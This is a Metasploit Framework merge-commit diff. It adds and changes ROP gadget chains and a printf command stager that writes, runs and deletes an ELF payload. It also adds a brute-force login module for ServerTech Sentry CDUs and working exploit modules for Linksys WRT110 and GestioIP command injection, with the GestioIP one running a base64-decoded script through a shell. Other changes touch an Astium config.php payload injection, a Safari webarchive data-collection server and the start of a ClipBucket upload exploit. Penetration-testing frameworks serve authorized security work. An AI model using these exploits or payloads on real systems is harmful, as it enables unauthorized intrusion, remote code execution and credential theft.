Merge branch 'master' into data_dir

Conflicts:
	lib/msf/core/auxiliary/jtr.rb
bug/bundler_fix
Meatballs 2013-10-10 19:55:26 +01:00
commit 9ca9b4ab29
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
55 changed files with 1176 additions and 395 deletions

View File

@ -7,6 +7,7 @@ hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>

View File

@ -11,7 +11,7 @@
<gadget offset="0x0001803c">POP EBP # RETN</gadget>
<gadget offset="0x0001803c">skip 4 bytes</gadget>
<gadget offset="0x0001750f">POP EBX # RETN</gadget>
<gadget value="fffffdff">0x00000201</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
@ -40,7 +40,7 @@
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
<gadget value="fffffdff">0x00000201</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>

View File

@ -9,7 +9,7 @@
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
<gadget offset="0x00024c66">skip 4 bytes</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget value="FFFFFBFF">0x00000201</gadget>
<gadget value="safe_negate_size">0x00000201</gadget>
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
<gadget value="0xffffffff"></gadget>

View File

@ -7,12 +7,21 @@
</compatibility>
<gadgets base="0x77c10000">
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001362c">POP EBX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
<gadget offset="0x0002ee15">skip 4 bytes</gadget>
<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
@ -33,23 +42,29 @@
</compatibility>
<gadgets base="0x77ba0000">
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget offset="0x00001114">VirtualProtect()</gadget>
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
<gadget value="junk">Filler</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x00026320">POP EBP # RETN</gadget>
<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
<gadget offset="0x000385b7">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x000330fb">POP ECX # RETN</gadget>
<gadget offset="0x0004ff56">Writable location</gadget>
<gadget offset="0x00038a92">POP EDI # RETN</gadget>
<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
<gadget value="nop">nop</gadget>
<gadget offset="0x00029801">POP EBP # RETN</gadget>
<gadget offset="0x00042265">ptr to 'push esp # ret'</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x03C0990F">EAX</gadget>
<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
<gadget offset="0x000148d3">POP EBX, RET</gadget>
<gadget offset="0x000521e0">.data</gadget>
<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
<gadget offset="0x00038c04">POP EDI # RETN</gadget>
<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x03C0944F">EAX</gadget>
<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="nop">NOP</gadget>
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
</gadgets>
</rop>

View File

@ -37,45 +37,57 @@ module Auxiliary::JohnTheRipper
autodetect_platform
end
# @return [String] the run path instance variable if the platform is detectable, nil otherwise.
def autodetect_platform
cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
return @run_path if @run_path
cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
if File.directory?(cpuinfo_base)
data = nil
case ::RUBY_PLATFORM
when /mingw|cygwin|mswin/
data = `"#{cpuinfo_base}/cpuinfo.exe"` rescue nil
case data
when /sse2/
@run_path ||= "run.win32.sse2/john.exe"
when /mmx/
@run_path ||= "run.win32.mmx/john.exe"
else
@run_path ||= "run.win32.any/john.exe"
end
when /x86_64-linux/
::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia64.bin") rescue nil
data = `#{cpuinfo_base}/cpuinfo.ia64.bin` rescue nil
case data
when /mmx/
@run_path ||= "run.linux.x64.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
when /i[\d]86-linux/
::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia32.bin") rescue nil
data = `#{cpuinfo_base}/cpuinfo.ia32.bin` rescue nil
case data
when /sse2/
@run_path ||= "run.linux.x86.sse2/john"
when /mmx/
@run_path ||= "run.linux.x86.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
case ::RUBY_PLATFORM
when /mingw|cygwin|mswin/
fname = "#{cpuinfo_base}/cpuinfo.exe"
if File.exists?(fname) and File.executable?(fname)
data = %x{"#{fname}"} rescue nil
end
case data
when /sse2/
@run_path ||= "run.win32.sse2/john.exe"
when /mmx/
@run_path ||= "run.win32.mmx/john.exe"
else
@run_path ||= "run.win32.any/john.exe"
end
when /x86_64-linux/
fname = "#{cpuinfo_base}/cpuinfo.ia64.bin"
if File.exists? fname
::FileUtils.chmod(0755, fname) rescue nil
data = %x{"#{fname}"} rescue nil
end
case data
when /mmx/
@run_path ||= "run.linux.x64.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
when /i[\d]86-linux/
fname = "#{cpuinfo_base}/cpuinfo.ia32.bin"
if File.exists? fname
::FileUtils.chmod(0755, fname) rescue nil
data = %x{"#{fname}"} rescue nil
end
case data
when /sse2/
@run_path ||= "run.linux.x86.sse2/john"
when /mmx/
@run_path ||= "run.linux.x86.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
end
end
@run_path
return @run_path
end
def john_session_id

View File

@ -0,0 +1,27 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
####
# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf.
#
# This stager uses a POSIX-conformant printf, that supports the interpretation
# of octal escapes, to drop an ELF with the payload embedded to disk.
####
module Exploit::CmdStagerPrintf
include Msf::Exploit::CmdStager
# Initializes a CmdStagerPrintf instance for the supplied payload
#
# @param exe [String] The payload embedded into an ELF
# @return [Rex::Exploitation::CmdStagerPrintf] Stager instance
def create_stager(exe)
Rex::Exploitation::CmdStagerPrintf.new(exe)
end
end
end

View File

@ -26,6 +26,7 @@ require 'msf/core/exploit/cmdstager_debug_asm'
require 'msf/core/exploit/cmdstager_tftp'
require 'msf/core/exploit/cmdstager_bourne'
require 'msf/core/exploit/cmdstager_echo'
require 'msf/core/exploit/cmdstager_printf'
# Protocol
require 'msf/core/exploit/tcp'

View File

@ -44,7 +44,8 @@ class Msf::Module::Author
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org'
'mubix' => 'mubix' + 0x40.chr + 'hak5.org',
'joev' => 'joev' + 0x40.chr + 'metasploit.com'
}
#

View File

@ -7,3 +7,4 @@ require 'rex/exploitation/cmdstager/debug_asm'
require 'rex/exploitation/cmdstager/tftp'
require 'rex/exploitation/cmdstager/bourne'
require 'rex/exploitation/cmdstager/echo'
require 'rex/exploitation/cmdstager/printf'

View File

@ -0,0 +1,122 @@
# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'msf/core/framework'
require 'shellwords'
module Rex
module Exploitation
class CmdStagerPrintf < CmdStagerBase
def initialize(exe)
super
@var_elf = Rex::Text.rand_text_alpha(5)
end
#
# Override to ensure opts[:temp] is a correct *nix path
#
def generate(opts = {})
opts[:temp] = opts[:temp] || '/tmp/'
opts[:temp].gsub!(/\\/, '/')
opts[:temp] = opts[:temp].shellescape
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
super
end
#
# Override to set the extra byte count
#
def generate_cmds(opts)
if opts[:noquotes]
@cmd_start = "printf "
@cmd_end = ">>#{@tempdir}#{@var_elf}"
@prefix = '\\\\'
min_part_size = 5
else
@cmd_start = "printf '"
@cmd_end = "'>>#{@tempdir}#{@var_elf}"
@prefix = '\\'
min_part_size = 4
end
xtra_len = @cmd_start.length + @cmd_end.length
opts.merge!({ :extra => xtra_len })
if (opts[:linemax] - opts[:extra]) < min_part_size
raise RuntimeError, "Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
end
super
end
#
# Encode into a "\12\345" octal format that printf understands
#
def encode_payload(opts)
return Rex::Text.to_octal(@exe, @prefix)
end
#
# Override it to ensure that the octal representation of a byte isn't cut
#
def slice_up_payload(encoded, opts)
encoded_dup = encoded.dup
parts = []
xtra_len = opts[:extra]
xtra_len ||= 0
while (encoded_dup.length > 0)
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
# remove the last octal escape if it is imcomplete
if encoded_dup.length > temp.length and encoded_dup[temp.length, @prefix.length] != @prefix
pos = temp.rindex('\\')
pos -= 1 if temp[pos-1] == '\\'
temp.slice!(pos..temp.length-1)
end
parts << temp
encoded_dup.slice!(0, temp.length)
end
parts
end
#
# Combine the parts of the encoded file with the stuff that goes
# before and after it.
#
def parts_to_commands(parts, opts)
parts.map do |p|
@cmd_start + p + @cmd_end
end
end
#
# Since the binary has been already dropped to disk, just execute and
# delete it
#
def generate_cmds_decoder(opts)
cmds = []
# Make it all happen
cmds << "chmod +x #{@tempdir}#{@var_elf}"
cmds << "#{@tempdir}#{@var_elf}"
# Clean up after unless requested not to..
unless opts[:nodelete]
cmds << "rm -f #{@tempdir}#{@var_elf}"
end
return cmds
end
def cmd_concat_operator
" ; "
end
end
end
end

View File

@ -29,7 +29,7 @@ class RopDb
#
# Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
# some integer). When the value is a symbol, it can be one of these: :nop, :junk, :size,
# and :size_negate.
# :unsafe_negate_size, and :safe_negate_size
# Note if no RoP is found, it returns an empry array.
# Arguments:
# rop_name - name of the ROP chain.
@ -90,8 +90,10 @@ class RopDb
Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
elsif e == :size
payload.length
elsif e == :size_negate
0xffffffff - payload.length + 1
elsif e == :unsafe_negate_size
get_unsafe_size(payload.length)
elsif e == :safe_negate_size
get_safe_size(payload.length)
else
e
end
@ -105,6 +107,28 @@ class RopDb
private
#
# Returns a size that's safe from null bytes.
# This function will keep incrementing the value of "s" until it's safe from null bytes.
#
def get_safe_size(s)
safe_size = get_unsafe_size(s)
while (safe_size.to_s(16).rjust(8, '0')).scan(/../).include?("00")
safe_size -= 1
end
safe_size
end
#
# Returns a size that might contain one or more null bytes
#
def get_unsafe_size(s)
0xffffffff - s + 1
end
#
# Checks if a ROP chain is compatible
#
@ -146,8 +170,10 @@ class RopDb
gadgets << :junk
when 'size'
gadgets << :size
when 'size_negate'
gadgets << :size_negate
when 'unsafe_negate_size'
gadgets << :unsafe_negate_size
when 'safe_negate_size'
gadgets << :safe_negate_size
else
gadgets << value.to_i(16)
end
@ -160,4 +186,4 @@ class RopDb
end
end
end
end

View File

@ -42,10 +42,13 @@ class MultiCaller
include DLLHelper
def initialize( client, parent )
def initialize( client, parent, win_consts )
@parent = parent
@client = client
# needed by DLL helper
@win_consts = win_consts
if( @client.platform =~ /x64/i )
@native = 'Q'
else
@ -224,9 +227,17 @@ class MultiCaller
rec_out_only_buffers = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_BUFFERBLOB_OUT)
rec_return_value = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_RET)
rec_last_error = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_ERR)
rec_err_msg = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_MSG)
# Error messages come back with trailing CRLF, so strip it out
# if we do get a message.
rec_err_msg.strip! if not rec_err_msg.nil?
# The hash the function returns
return_hash={"GetLastError" => rec_last_error}
return_hash = {
"GetLastError" => rec_last_error,
"ErrorMessage" => rec_err_msg
}
#process return value
case function.return_type
@ -303,8 +314,6 @@ class MultiCaller
protected
attr_accessor :win_consts
end # MultiCall
end; end; end; end; end; end

View File

@ -290,7 +290,7 @@ class Railgun
#
def multi(functions)
if @multicaller.nil?
@multicaller = MultiCaller.new(client, self)
@multicaller = MultiCaller.new(client, self, ApiConstants.manager)
end
return @multicaller.call(functions)

View File

@ -12,6 +12,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
# [Array<Array<Hash>>] list of poisonable scripts per user-specified URLS
attr_accessor :scripts_to_poison
@ -177,17 +178,39 @@ class Metasploit3 < Msf::Auxiliary
def on_request_uri(cli, request)
begin
data = if request.body.size > 0
data_str = if request.body.size > 0
request.body
else
request.qstring['data']
end
data = JSON::parse(data || '')
print_status "Received data: #{data}"
rescue # json error, dismiss request & keep crit. server up
data = JSON::parse(data_str || '')
file = record_data(data, cli)
send_response_html(cli, '')
print_good "#{data_str.length} chars received and stored to #{file}"
rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
print_error "Invalid JSON received: #{data_str}"
send_not_found(cli)
end
end
# @param [Hash] data the data to store in the log
# @return [String] filename where we are storing the data
def record_data(data, cli)
@client_cache ||= Hash.new({})
@client_cache[cli.peerhost]['file'] ||= store_loot(
"safari.client", "text/plain", cli.peerhost, '', "safari_webarchive", "Webarchive Collected Data"
)
file = @client_cache[cli.peerhost]['file']
@client_cache[cli.peerhost]['data'] ||= []
@client_cache[cli.peerhost]['data'].push(data)
data_str = JSON.generate(@client_cache[cli.peerhost]['data'])
File.write(file, data_str)
file
end
### ASSEMBLE THE WEBARCHIVE XML ###
# @return [String] contents of webarchive as an XML document
@ -531,9 +554,11 @@ class Metasploit3 < Msf::Auxiliary
var sent = false;
req.open('GET', '#{url}', true);
req.onreadystatechange = function() {
if (!sent) {
sendData('response_headers', req.getAllResponseHeaders());
sendData('response_body', req.responseText);
if (req.readyState==4 && !sent) {
sendData('#{url}', {
response_headers: req.getAllResponseHeaders(),
response_body: req.responseText
});
sent = true;
}
};
@ -647,8 +672,7 @@ class Metasploit3 < Msf::Auxiliary
%Q|
window.sendData = function(key, val) {
var data = {};
if (key && val) data[key] = val;
if (!val) data = key;
data[key] = val;
window.top.postMessage(JSON.stringify(data), "*")
};
|

View File

@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
out, filename = fingerprint(res)
print_status("#{peer} #{out}") if out
if(out =~ /Not Vulnerable/)
if(out =~ /Not Vulnerable/)
print_status("#{peer} isn't vulnerable to this attack")
return
end

View File

@ -124,6 +124,7 @@ class Metasploit3 < Msf::Auxiliary
query = @res.search(host, "A")
if query
query.answer.each do |rr|
next unless rr.type == "A"
record = {}
record[:host] = host
record[:type] = "A"
@ -134,6 +135,7 @@ class Metasploit3 < Msf::Auxiliary
query1 = @res.search(host, "AAAA")
if query1
query1.answer.each do |rr|
next unless rr.type == "AAAA"
record = {}
record[:host] = host
record[:type] = "AAAA"
@ -189,6 +191,7 @@ class Metasploit3 < Msf::Auxiliary
query = @res.query(target, "TXT")
return results if not query
query.answer.each do |rr|
next unless rr.type == "TXT"
record = {}
record[:host] = target
record[:text] = rr.txt

View File

@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
end
def gen_blank_passwords(users, credentials)
return credentials
return credentials
end
def run_host(ip)

View File

@ -0,0 +1,112 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Sentry Switched CDU Bruteforce Login Utility',
'Description' => %{
This module scans for ServerTech's Sentry Switched CDU (Cabinet Power
Distribution Unit) web login portals, and performs login brute force
to identify valid credentials.
},
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('USERNAME', [true, "A specific username to authenticate as, default 'admn'", "admn"]),
OptString.new('PASSWORD', [true, "A specific password to authenticate with, deault 'admn'", "admn"])
], self.class)
end
def run_host(ip)
unless is_app_sentry?
print_error("#{rhost}:#{rport} - Sentry Switched CDU not found. Module will not continue.")
return
end
print_status("#{rhost}:#{rport} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
#
# What's the point of running this module if the app actually isn't Sentry
#
def is_app_sentry?
begin
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
return false
end
if (res and res.body.include?("Sentry Switched CDU"))
vprint_good("#{rhost}:#{rport} - Running ServerTech Sentry Switched CDU")
return true
else
return false
end
end
#
# Brute-force the login page
#
def do_login(user, pass)
vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/index.html',
'method' => 'GET',
'authorization' => basic_auth(user,pass)
})
if (res and res.headers['Set-Cookie'])
print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
:port => rport,
:sname => 'ServerTech Sentry Switched CDU',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
return :abort
end
end
end

View File

@ -39,9 +39,14 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '1999-0506'], # Weak password
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'DB_ALL_CREDS' => false,
'BLANK_PASSWORDS' => false,
'USER_AS_PASS' => false
}
)
deregister_options('RHOST','USERNAME','PASSWORD')

View File

@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');"
# Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root,
# else during the config reload it might happen that an extra shell is spawned as the apache user.
phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"
phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"
phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"
phppayload << "fwrite($f, $orig . \"<?php if (posix_getuid() == 0) {\" . $replacement . \"} ?>\");"
phppayload << "fclose($f);"
@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 120)
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
# we don't have a shell, either.
if res and res.code != 200
print_error("#{peer} - Unexpected response...")
end

View File

@ -0,0 +1,121 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys WRT110 Remote Command Execution',
'Description' => %q{
The Linksys WRT110 consumer router is vulnerable to a command injection
exploit in the ping field of the web interface.
},
'Author' =>
[
'Craig Young', # Vulnerability discovery
'joev', # msf module
'juan vazquez' # module help + echo cmd stager
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-3568'],
['BID', '61151'],
['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
],
'DisclosureDate' => 'Jul 12 2013',
'Privileged' => true,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSLE,
'Targets' =>
[
['Linux mipsel Payload', { } ]
],
'DefaultTarget' => 0,
))
register_options([
OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/'
})
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
test_login!
execute_cmdstager
end
# Sends an HTTP request with authorization header to the router
# Raises an exception unless the login is successful
def test_login!
print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
res = send_auth_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if not res or res.code == 401 or res.code == 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
else
print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
end
end
# Run the command on the router
def execute_command(cmd, opts)
send_auth_request_cgi({
'uri' => '/ping.cgi',
'method' => 'POST',
'vars_post' => {
'pingstr' => '& ' + cmd
}
})
Rex.sleep(1) # Give the device a second
end
# Helper methods
def user; datastore['USERNAME']; end
def pass; datastore['PASSWORD'] || ''; end
def send_auth_request_cgi(opts={}, timeout=nil)
timeout ||= datastore['TIMEOUT']
opts.merge!('authorization' => basic_auth(user, pass))
begin
send_request_cgi(opts, timeout)
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
end

View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Neal Poole', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>' # Metasploit module
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>

View File

@ -0,0 +1,95 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'GestioIP Remote Command Execution',
'Description' => %q{
This module exploits a command injection flaw to create a shell script
on the filesystem and execute it. If GestioIP is configured to use no authentication,
no password is required to exploit the vulnerability. Otherwise, an authenticated
user is required to exploit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' #Initial Discovery and metasploit module
],
'References' =>
[
[ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
],
'Payload' =>
{
'Space' => 475, # not a lot of room
'DisableNops' => true,
'BadChars' => "",
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic GestioIP 3.0', { }]],
'Privileged' => false,
'DisclosureDate' => 'Oct 4 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'URI', '/gestioip/']),
OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
OptString.new('PASSWORD', [false, 'The password to auth with', nil])
], self.class)
end
def user
datastore['USERNAME']
end
def pass
datastore['PASSWORD']
end
def use_auth
!(pass.nil? or pass.empty?)
end
def exploit
pay = Rex::Text.encode_base64(payload.encoded)
file = Rex::Text.rand_text_alpha(8)
options = {
'uri' => normalize_uri(target_uri.path, "ip_checkhost.cgi"),
'encode_params' => false,
'vars_get' => {
'ip' => "2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004",
'hostname' => "fds",
'client_id' => "1",
'ip_version' => ""
}
}
if use_auth
options.merge!('authorization' => basic_auth(user,pass))
end
res = send_request_cgi(options)
if res and res.code == 401
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSOWRD")
end
end
end

View File

@ -10,6 +10,11 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
# handle module misnomer
require 'msf/core/module/deprecated'
include Msf::Module::Deprecated
deprecated Date.new(2013, 12, 7), 'exploit/linux/http/linksys_wrt110_cmd_exec'
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
@ -23,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' =>
[
'Craig Young', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>', # msf module
'joev', # msf module
'juan vazquez' # module help + echo cmd stager
],
'License' => MSF_LICENSE,

View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Local
'Author' =>
[
'Todd C. Miller', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>', # Metasploit module
'joev', # Metasploit module
'juan vazquez' # testing/fixing module bugs
],
'References' =>

View File

@ -0,0 +1,118 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "ClipBucket Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in ClipBucket version 2.6 and lower.
The script "/admin_area/charts/ofc-library/ofc_upload_image.php" can be used to
upload arbitrary code without any authentication. This module has been tested
on version 2.6 on CentOS 5.9 32-bit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gabby', # Vulnerability Discovery, PoC
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://packetstormsecurity.com/files/123480/ClipBucket-Remote-Code-Execution.html' ]
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Clipbucket 2.6', {}]
],
'Privileged' => false,
'DisclosureDate' => "Oct 04 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
], self.class)
end
def uri
return target_uri.path
end
def check
# Check version
